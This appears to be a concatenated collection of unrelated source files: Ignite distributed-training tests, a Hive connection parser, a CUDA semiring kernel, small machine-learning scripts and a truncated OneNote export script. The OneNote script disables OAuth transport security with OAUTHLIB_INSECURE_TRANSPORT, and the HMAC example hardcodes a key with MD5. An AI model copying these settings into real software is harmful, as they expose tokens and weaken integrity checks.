@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_nccl_but_no_gpu(mock_gpu_is_not_available):
with pytest.raises(RuntimeError, match=r"Nccl backend is required but no cuda capable devices"):
_NativeDistModel(backend="nccl")
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_config():
import os
from datetime import timedelta
os.environ["RANK"] = "1"
with pytest.raises(RuntimeError, match=r"PyTorch distributed configuration should define env variables"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
del os.environ["RANK"]
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_slurm_config():
import os
from datetime import timedelta
os.environ["SLURM_JOB_ID"] = "1"
with pytest.raises(RuntimeError, match=r"SLURM distributed configuration is missing"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
with pytest.raises(ValueError, match=r"Arguments rank and world_size should not be specified with SLURM"):
_NativeDistModel.create_from_backend(
backend="gloo", timeout=timedelta(seconds=10), rank=1, init_method="", world_size=1
)
os.environ["SLURM_PROCID"] = "0"
os.environ["SLURM_LOCALID"] = "0"
os.environ["SLURM_NTASKS"] = "1"
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
os.environ["RANK"] = "1"
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
model = _NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
del os.environ["RANK"]
def _assert_model(model, true_conf):
assert model.device() == torch.device(true_conf["device"])
assert model.get_local_rank() == true_conf["local_rank"]
assert model.get_rank() == true_conf["rank"]
assert model.get_world_size() == true_conf["world_size"]
assert model.get_node_rank() == true_conf["node_index"]
assert model.get_nnodes() == true_conf["nnodes"]
assert model.get_nproc_per_node() == true_conf["nproc_per_node"]
def _test__native_dist_model_create_from_backend_no_dist(backend, true_device):
from datetime import timedelta
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timedelta(seconds=20))
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
_assert_model(
model,
{
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
},
)
model.finalize()
def _test__native_dist_model_create_from_backend_dist(init_method, local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
os.environ["RANK"] = f"{rank}"
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout, init_method=init_method)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
if init_method is None:
assert model._init_method == "env://"
else:
assert model._init_method == init_method
model.finalize()
del os.environ["RANK"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
def _test__native_dist_model_create_from_backend_slurm(local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
del os.environ["WORLD_SIZE"]
del os.environ["LOCAL_RANK"]
os.environ["SLURM_JOB_ID"] = "15000"
os.environ["SLURM_PROCID"] = str(rank)
os.environ["SLURM_LOCALID"] = str(local_rank)
os.environ["SLURM_NTASKS"] = str(world_size)
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
os.environ["WORLD_SIZE"] = str(world_size)
os.environ["LOCAL_RANK"] = str(local_rank)
def _test__native_dist_model_create_from_context_no_local_rank():
if "LOCAL_RANK" in os.environ:
del os.environ["LOCAL_RANK"]
from ignite.distributed.comp_models.base import ComputationModel
if ComputationModel._ext_local_rank is not None:
ComputationModel._ext_local_rank = None
with pytest.warns(UserWarning, match=r"Local rank information for native distributed setting will be initialized"):
_NativeDistModel.create_from_context()
def _test__native_dist_model_create_from_context_env_local_rank(true_conf):
import os
remove_lrank = False
if "LOCAL_RANK" not in os.environ:
os.environ["LOCAL_RANK"] = str(true_conf["local_rank"])
remove_lrank = True
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
if remove_lrank:
del os.environ["LOCAL_RANK"]
def _test__native_dist_model_create_from_context_set_local_rank(true_conf):
from ignite.distributed.comp_models.base import ComputationModel
lrank = None
if "LOCAL_RANK" in os.environ:
lrank = os.environ["LOCAL_RANK"]
del os.environ["LOCAL_RANK"]
ComputationModel._ext_local_rank = true_conf["local_rank"]
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
ComputationModel._ext_local_rank = None
if lrank is not None:
os.environ["LOCAL_RANK"] = lrank
def _test__native_dist_model_create_from_context_no_dist(true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=1, rank=0)
dist.barrier()
_test__native_dist_model_create_from_context_no_local_rank()
true_conf = {
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
def _test__native_dist_model_create_from_context_dist(local_rank, rank, world_size, true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=world_size, rank=rank)
dist.barrier()
if torch.cuda.is_available():
torch.cuda.set_device(local_rank)
true_conf = {
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
def test__native_dist_model_create_no_dist_gloo(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("gloo", device)
_test__native_dist_model_create_from_context_no_dist("gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_no_dist_nccl(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("nccl", device)
_test__native_dist_model_create_from_context_no_dist("nccl", device)
@pytest.mark.distributed
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_gloo_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_gloo_1')}/shared"
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_dist(init_method, local_rank, local_rank, world_size, "gloo", device)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
def test__native_dist_model_create_dist_gloo_2(local_rank, world_size):
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "gloo", device)
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_nccl_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_nccl_1')}/shared"
_test__native_dist_model_create_from_backend_dist(
init_method, local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(
local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_dist_nccl_2(local_rank, world_size):
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}")
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Skip if less than 2 GPUs")
def test__native_dist_model_warning_index_less_localrank(local_rank, world_size):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group("nccl", "tcp://0.0.0.0:2222", world_size=world_size, rank=local_rank)
dist.barrier()
# We deliberately incorrectly set cuda device to 0
torch.cuda.set_device(0)
model = _NativeDistModel.create_from_context()
assert isinstance(model, _NativeDistModel), f"{type(model)} vs _NativeDistModel"
if local_rank == 1:
with pytest.warns(UserWarning, match=r"Current device index is less than current local rank."):
model.device()
dist.destroy_process_group()
def _test_dist_spawn_fn(local_rank, backend, world_size, device):
from ignite.distributed.utils import _model
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
assert isinstance(_model, _NativeDistModel), f"{type(_model)} vs _NativeDistModel"
assert _model.get_local_rank() == local_rank
assert _model.get_world_size() == world_size
assert _model.device().type == torch.device(device).type
def _test__native_dist_model_spawn(backend, num_workers_per_machine, device, init_method=None, **spawn_kwargs):
_NativeDistModel.spawn(
_test_dist_spawn_fn,
args=(backend, num_workers_per_machine, device),
kwargs_dict={},
backend=backend,
nproc_per_node=num_workers_per_machine,
init_method=init_method,
**spawn_kwargs,
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.parametrize("init_method", [None, "env://", "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_gloo(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
nproc = torch.cuda.device_count() if torch.cuda.is_available() else 4
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_spawn("gloo", num_workers_per_machine=nproc, device=device, init_method=init_method)
if device.type == "cpu":
_test__native_dist_model_spawn(
"gloo", num_workers_per_machine=nproc, device=device, start_method="fork", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_nccl(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
num_workers_per_machine = torch.cuda.device_count()
_test__native_dist_model_spawn(
"nccl", num_workers_per_machine=num_workers_per_machine, device="cuda", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_none(world_size):
with pytest.raises(ValueError, match=r"Arguments rank and world_size should be None"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_not_none(world_size, local_rank, get_fixed_dirname):
init_method = f"file://{get_fixed_dirname('native_dist_model_init_method_is_not_none')}/shared"
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size, init_method=init_method)
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", rank=local_rank, init_method=init_method)
@pytest.mark.parametrize(
"environ, expected",
[
# fmt: off
# usual SLURM env
(
{
"SLURM_PROCID": "1", "SLURM_LOCALID": "1", "SLURM_NTASKS": "2", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
},
[1, 1, 2, "c1", 17345]
),
# usual SLURM env mnode
(
{
"SLURM_PROCID": "5", "SLURM_LOCALID": "1", "SLURM_NTASKS": "8", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
},
[5, 1, 8, "c1", 17345]
),
# usual SLURM env 1 node, 1 task + torch.distributed.launch
(
{
"SLURM_PROCID": "0", "SLURM_LOCALID": "0", "SLURM_NTASKS": "1", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "127.0.0.1", "MASTER_PORT": "2233", "RANK": "2", "LOCAL_RANK": "2", "WORLD_SIZE": "8",
},
[2, 2, 8, "127.0.0.1", 2233]
),
# usual SLURM env + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "3", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "3", "WORLD_SIZE": "4",
},
[3, 3, 4, "c1", 12233]
),
# usual SLURM env mnode + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "1", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "1", "WORLD_SIZE": "4"
},
[3, 1, 4, "c1", 12233]
),
# fmt: on
],
)
def test__setup_ddp_vars_from_slurm_env(environ, expected):
ddp_keys = ["RANK", "LOCAL_RANK", "WORLD_SIZE", "MASTER_ADDR", "MASTER_PORT"]
ddp_vars = _setup_ddp_vars_from_slurm_env(environ)
for key, value in zip(ddp_keys, expected):
assert key in ddp_vars
assert ddp_vars[key] == value
def test__setup_ddp_vars_from_slurm_env_bad_configs():
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(RuntimeError, match=r"No hostname detected in SLURM_JOB_NODELIST by ignite"):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "[]",
"SLURM_JOB_ID": "12345",
}
_setup_ddp_vars_from_slurm_env(environ)
|
16034
|
import re
from typing import Dict, Tuple, List, NamedTuple, Optional
from lib.utils.decorators import with_exception_retry
from .helpers.common import (
split_hostport,
get_parsed_variables,
merge_hostport,
random_choice,
)
from .helpers.zookeeper import get_hostname_and_port_from_zk
# TODO: make these configurable?
MAX_URI_FETCH_ATTEMPTS = 10
MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC = 5
class RawHiveConnectionConf(NamedTuple):
# Raw Connection Configuration that's from a string -> dict transformation
hosts: List[Tuple[str, Optional[int]]]
default_db: str
session_variables: Dict[str, str]
conf_list: Dict[str, str]
var_list: Dict[str, str]
class HiveConnectionConf(NamedTuple):
host: str
port: Optional[int]
default_db: str
configuration: Dict[str, str]
def _extract_connection_url(connection_string: str) -> RawHiveConnectionConf:
# Parser for Hive JDBC string
# Loosely based on https://cwiki.apache.org/confluence/display/Hive/HiveServer2+Clients#HiveServer2Clients-JDBC
match = re.search(
r"^(?:jdbc:)?hive2:\/\/([\w.-]+(?:\:\d+)?(?:,[\w.-]+(?:\:\d+)?)*)\/(\w*)((?:;[\w.-]+=[\w.-]+)*)(\?[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?(\#[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?$", # noqa: E501
connection_string,
)
hosts = match.group(1)
default_db = match.group(2) or "default"
session_variables = match.group(3) or ""
conf_list = match.group(4) or ""
var_list = match.group(5) or ""
parsed_hosts = []
for hostport in hosts.split(","):
parsed_hosts.append(split_hostport(hostport))
parsed_session_variables = get_parsed_variables(session_variables[1:])
parsed_conf_list = get_parsed_variables(conf_list[1:])
parsed_var_list = get_parsed_variables(var_list[1:])
return RawHiveConnectionConf(
hosts=parsed_hosts,
default_db=default_db,
session_variables=parsed_session_variables,
conf_list=parsed_conf_list,
var_list=parsed_var_list,
)
@with_exception_retry(
max_retry=MAX_URI_FETCH_ATTEMPTS,
get_retry_delay=lambda retry: min(MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC, retry),
)
def get_hive_host_port_from_zk(
connection_conf: RawHiveConnectionConf,
) -> Tuple[str, int]:
zk_quorum = ",".join(
map(lambda hostport: merge_hostport(hostport), connection_conf.hosts)
)
zk_namespace = connection_conf.session_variables.get("zooKeeperNamespace")
raw_server_uris = get_hostname_and_port_from_zk(zk_quorum, zk_namespace) or []
server_uri_dicts = filter(
lambda d: d is not None,
[_server_uri_to_dict(raw_server_uri) for raw_server_uri in raw_server_uris],
)
server_uris = list(map(lambda d: d["serverUri"], server_uri_dicts))
random_server_uri = random_choice(server_uris)
if not random_server_uri:
raise Exception("Failed to get hostname and port from Zookeeper")
return split_hostport(random_server_uri)
def _server_uri_to_dict(server_uri: str) -> Optional[Dict[str, str]]:
match = re.search(r"serverUri=(.*);version=(.*);sequence=(.*)", server_uri)
if match:
return {
"serverUri": match.group(1),
"version": match.group(2),
"sequence": match.group(3),
}
def get_hive_connection_conf(connection_string: str) -> HiveConnectionConf:
hostname = None
port = None
connection_conf = _extract_connection_url(connection_string)
# We use zookeeper to find host name
if connection_conf.session_variables.get("serviceDiscoveryMode") == "zooKeeper":
hostname, port = get_hive_host_port_from_zk(connection_conf)
else: # We just return a normal host
hostname, port = random_choice(connection_conf.hosts, default=(None, None))
return HiveConnectionConf(
host=hostname,
port=port,
default_db=connection_conf.default_db,
configuration=connection_conf.conf_list,
)
|
16050
|
RRNN_SEMIRING = """
extern "C" {
__global__ void rrnn_semiring_fwd(
const float * __restrict__ u,
const float * __restrict__ eps,
const float * __restrict__ c1_init,
const float * __restrict__ c2_init,
const int len,
const int batch,
const int dim,
const int k,
float * __restrict__ c1,
float * __restrict__ c2,
int semiring_type) {
assert (k == K);
int ncols = batch*dim;
int col = blockIdx.x * blockDim.x + threadIdx.x;
if (col >= ncols) return;
int ncols_u = ncols*k;
const float *up = u + (col*k);
float *c1p = c1 + col;
float *c2p = c2 + col;
float cur_c1 = *(c1_init + col);
float cur_c2 = *(c2_init + col);
const float eps_val = *(eps + (col%dim));
for (int row = 0; row < len; ++row) {
float u1 = *(up);
float u2 = *(up+1);
float forget1 = *(up+2);
float forget2 = *(up+3);
float prev_c1 = cur_c1;
float op1 = times_forward(semiring_type, cur_c1, forget1);
cur_c1 = plus_forward(semiring_type, op1, u1);
float op2 = times_forward(semiring_type, cur_c2, forget2);
float op3_ = plus_forward(semiring_type, eps_val, prev_c1);
float op3 = times_forward(semiring_type, op3_, u2);
cur_c2 = plus_forward(semiring_type, op2, op3);
*c1p = cur_c1;
*c2p = cur_c2;
up += ncols_u;
c1p += ncols;
c2p += ncols;
}
}
__global__ void rrnn_semiring_bwd(
const float * __restrict__ u,
const float * __restrict__ eps,
const float * __restrict__ c1_init,
const float * __restrict__ c2_init,
const float * __restrict__ c1,
const float * __restrict__ c2,
const float * __restrict__ grad_c1,
const float * __restrict__ grad_c2,
const float * __restrict__ grad_last_c1,
const float * __restrict__ grad_last_c2,
const int len,
const int batch,
const int dim,
const int k,
float * __restrict__ grad_u,
float * __restrict__ grad_eps,
float * __restrict__ grad_c1_init,
float * __restrict__ grad_c2_init,
int semiring_type) {
assert (k == K);
int ncols = batch*dim;
int col = blockIdx.x * blockDim.x + threadIdx.x;
if (col >= ncols) return;
int ncols_u = ncols*k;
float cur_c1 = *(grad_last_c1 + col);
float cur_c2 = *(grad_last_c2 + col);
const float eps_val = *(eps + (col%dim));
const float *up = u + (col*k) + (len-1)*ncols_u;
const float *c1p = c1 + col + (len-1)*ncols;
const float *c2p = c2 + col + (len-1)*ncols;
const float *gc1p = grad_c1 + col + (len-1)*ncols;
const float *gc2p = grad_c2 + col + (len-1)*ncols;
float *gup = grad_u + (col*k) + (len-1)*ncols_u;
float geps = 0.f;
for (int row = len-1; row >= 0; --row) {
float u1 = *(up);
float u2 = *(up+1);
float forget1 = *(up+2);
float forget2 = *(up+3);
const float c1_val = *c1p;
const float c2_val = *c2p;
const float prev_c1 = (row>0) ? (*(c1p-ncols)) : (*(c1_init+col));
const float prev_c2 = (row>0) ? (*(c2p-ncols)) : (*(c2_init+col));
const float gc1 = *(gc1p) + cur_c1;
const float gc2 = *(gc2p) + cur_c2;
cur_c1 = cur_c2 = 0.f;
float op1 = times_forward(semiring_type, prev_c1, forget1);
float gop1 = 0.f, gu1 = 0.f;
plus_backward(semiring_type, op1, u1, gc1, gop1, gu1);
float gprev_c1 = 0.f, gprev_c2 = 0.f, gforget1=0.f;
times_backward(semiring_type, prev_c1, forget1, gop1, gprev_c1, gforget1);
*(gup) = gu1;
*(gup+2) = gforget1;
cur_c1 += gprev_c1;
float op2 = times_forward(semiring_type, prev_c2, forget2);
float op3_ = plus_forward(semiring_type, eps_val, prev_c1);
float op3 = times_forward(semiring_type, op3_, u2);
float gop2 = 0.f, gop3 = 0.f;
plus_backward(semiring_type, op2, op3, gc2, gop2, gop3);
float gop3_ = 0.f, gu2 = 0.f, gforget2 = 0.f, cur_geps=0.f;
times_backward(semiring_type, prev_c2, forget2, gop2, gprev_c2, gforget2);
times_backward(semiring_type, op3_, u2, gop3, gop3_, gu2);
plus_backward(semiring_type, eps_val, prev_c1, gop3_, cur_geps, gprev_c1);
*(gup+1) = gu2;
*(gup+3) = gforget2;
geps += cur_geps;
cur_c1 += gprev_c1;
cur_c2 += gprev_c2;
up -= ncols_u;
c1p -= ncols;
c2p -= ncols;
gup -= ncols_u;
gc1p -= ncols;
gc2p -= ncols;
}
*(grad_c1_init + col) = cur_c1;
*(grad_c2_init + col) = cur_c2;
*(grad_eps + col%dim) = geps;
}
}
"""
|
16117
|
from data_reader.reader import CsvReader
from util import *
import numpy as np
import matplotlib.pyplot as plt
class LogisticRegression(object):
def __init__(self, learning_rate=0.01, epochs=50):
self.__epochs= epochs
self.__learning_rate = learning_rate
def fit(self, X, y):
self.w_ = np.zeros(1 + X.shape[1])
self.cost_ = []
for i in range(self.__epochs):
# 1- Calculate the net input W^T * x
z = self.__net_input(X)
# 2- Get the activation using Sigmoid function
h = self.__activation(z)
# 3- Calculate the gradient
temp = X.T.dot(y - h)
# 4- Update the weights and bias using the gradient and learning rate
self.w_[1:] += self.__learning_rate * temp
self.w_[0] += self.__learning_rate * sum(temp)
# 5- Uncomment the cost collecting line
self.cost_.append(self.__logit_cost(y, self.__activation(z)))
def __logit_cost(self, y, y_val):
logit = -y.dot(np.log(y_val)) - ((1 - y).dot(np.log(1 - y_val)))
return logit
def __sigmoid(self, z):
return 1.0 / (1.0 + np.exp(-z))
def __net_input(self, X):
return np.dot(X, self.w_[1:]) + self.w_[0]
def __activation(self, X):
return self.__sigmoid(X)
def predict(self, X):
# 1- Calculate the net input W^T * x
z = self.__net_input(X)
# 2- Return the activated values (0 or 1 classes)
h = self.__activation(z)
return np.where(self.__activation(z) >= 0.5, 1, 0)
reader = CsvReader("./data/Iris.csv")
iris_features, iris_labels = reader.get_iris_data()
ignore_verginica = [i for i, v in enumerate(iris_labels) if v == 'Iris-virginica']
iris_features = [v for i, v in enumerate(iris_features) if i not in ignore_verginica]
iris_labels = [v for i, v in enumerate(iris_labels) if i not in ignore_verginica]
print(len(iris_features))
print(len(iris_labels))
iris_features, iris_labels = shuffle(iris_features, iris_labels)
iris_labels = to_onehot(iris_labels)
iris_labels = list(map(lambda v: v.index(max(v)), iris_labels))
train_x, train_y, test_x, test_y = iris_features[0:89], iris_labels[0:89], iris_features[89:], iris_labels[89:]
train_x, train_y, test_x, test_y = np.asarray(train_x), np.asarray(train_y), np.asarray(test_x), np.asarray(test_y)
train_x, means, stds = standardize(train_x)
test_x = standardize(test_x, means, stds)
lr = LogisticRegression(learning_rate=0.1, epochs=50)
lr.fit(train_x, train_y)
plt.plot(range(1, len(lr.cost_) + 1), np.log10(lr.cost_))
plt.xlabel('Epochs')
plt.ylabel('Cost')
plt.title('Logistic Regression - Learning rate 0.1')
plt.tight_layout()
plt.show()
predicted_test = lr.predict(test_x)
print("Test Accuracy: " + str(((sum([predicted_test[i] == test_y[i] for i in range(0, len(predicted_test))]) / len(predicted_test)) * 100.0)) + "%")
|
16148
|
import hmac
hmac_md5 = hmac.new('secret-key')
f = open('sample-file.txt', 'rb')
try:
while True:
block = f.read(1024)
if not block:
break
hmac_md5.update(block)
finally:
f.close()
digest = hmac_md5.hexdigest()
print digest
|
16159
|
import logging
import time
import numpy as np
from eda import ma_data, tx_data
from sir_fitting_us import seir_experiment, make_csv_from_tx_traj
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.info("Fitting model.")
# initial values taken from previous fit, used to seed MH sampler efficiently.
x0 = np.array([ 0.393, -2.586, -3.241, -5.874, -24.999])
# ma_traj = seir_experiment(ma_data, x0, iterations=10000)
tx_traj = seir_experiment(tx_data, x0, iterations=10000)
# mean_ll = np.mean([ll for (x, ll) in ma_traj])
mean_ll = np.mean([ll for (x, ll) in tx_traj])
logger.info("Model fitting finished with mean log-likelihood: {}".format(mean_ll))
if mean_ll < -2000:
raise AssertionError(
"""Mean log-likelihood {} less than threshold of
-20. This is probably an error.""".format(mean_ll)
)
underscored_time = time.ctime().replace(" ", "_")
fname = "ma_seir_output_{}.csv".format(underscored_time)
make_csv_from_tx_traj(tx_traj, tx_data, fname)
|
16166
|
import mod
def foo():
return 1
try:
mod.foo = foo
except RuntimeError:
print("RuntimeError1")
print(mod.foo())
try:
mod.foo = 1
except RuntimeError:
print("RuntimeError2")
print(mod.foo)
try:
mod.foo = 2
except RuntimeError:
print("RuntimeError3")
print(mod.foo)
def __main__():
pass
|
16176
|
import argparse
import logging
import os
import pathlib
import time
import log
import onenote_auth
import onenote
import pipeline
logger = logging.getLogger()
def main():
args = parse_args()
if args.verbose:
log.setup_logging(logging.DEBUG)
else:
log.setup_logging(logging.INFO)
# Allow a redirect URI over plain HTTP (no TLS):
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = "1"
# Authorize the app:
s = onenote_auth.get_session(args.new_session)
output_dir = pathlib.Path(args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
logger.info('Writing to "%s"', output_dir)
start_time = time.perf_counter()
pipe = pipeline.Pipeline(s, args.notebook, output_dir)
pages = 0
try:
for page_count, page in enumerate(
onenote.get_notebook_pages(s, args.notebook), 1
):
